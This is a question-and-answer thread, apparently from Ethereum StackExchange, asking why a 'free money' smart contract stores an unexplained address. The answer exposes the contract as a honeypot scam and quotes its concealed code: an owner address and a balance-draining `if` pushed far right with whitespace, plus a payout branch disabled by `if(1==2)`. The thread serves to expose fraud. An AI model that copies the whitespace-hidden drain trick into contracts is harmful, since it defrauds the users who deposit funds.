# Why does the contract deployment code of a specific contract saves an address to storage?

Tags: contract-deployment

The contract in question can be found on the mainnet at https://etherscan.io/address/0x61dc347d7fA0f6e34c3112fAF83a2e468D681F68#code.

This looks too good to be true, free money, so something must be up.

The (current) storage looks like:

1. `getStorageAt(address, 0) = 0x00000000000000000000000060da28631ec462cad5b9f30fc9fb58e13ebfcdd8`
2. `getStorageAt(address, 1) = 0xb09982f0abd48c53f7be8cc09b2fb3e0b81936246a6d5c0c60cb7a85544e1414`

The value at offset 1 is set by a [transaction](https://etherscan.io/tx/0xae946d7be4cac79294ec3a4f7939aeecda88b61f5dd00ff452fceb5b48113524), but I do not understand where the value at offset 0 comes from. Note that this value is equal to the from-address of the contract creation [transaction](https://etherscan.io/tx/0x282ef72fc2b10152ebbe7b49b0d3fbd7e32bd31fc08f91fc3033132bc497e87c).

After compiling the code using Remix and double checking the bytecode it seems to be all correct (the fact the source is verified already suggested this of course).

One of the opcodes in the contract deployment code is:

```
0005 PUSH20 60da28631ec462cad5b9f30fc9fb58e13ebfcdd8
```

This is exactly the address that ends up in storage.

---

My **questions** are:

1. Why does this address pop up in the bytecode to start with?
2. How can it be that apparently someone has control over this address? (See https://etherscan.io/address/0x60da28631ec462cad5b9f30fc9fb58e13ebfcdd8)

I might be missing something trivial, but it is kind of bothering me.

Comment: I'm voting to close this question as off-topic because it's like malware.

Answer (score 2):

Scroll to the right in the contract code - this is a scam.

line 4, waaaaaaaaay over to the right:
`address prop = 0x60DA28631eC462cAD5B9f30Fc9fb58E13EbFCdD8`

followed by a nice little `if` statement on line 24 (again, way over to the right):
`if(msg.sender==prop){msg.sender.transfer(this.balance);}if(1==2){
        if(hashPass == sha3(pass))
        {
            msg.sender.transfer(this.balance);
        }                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    }`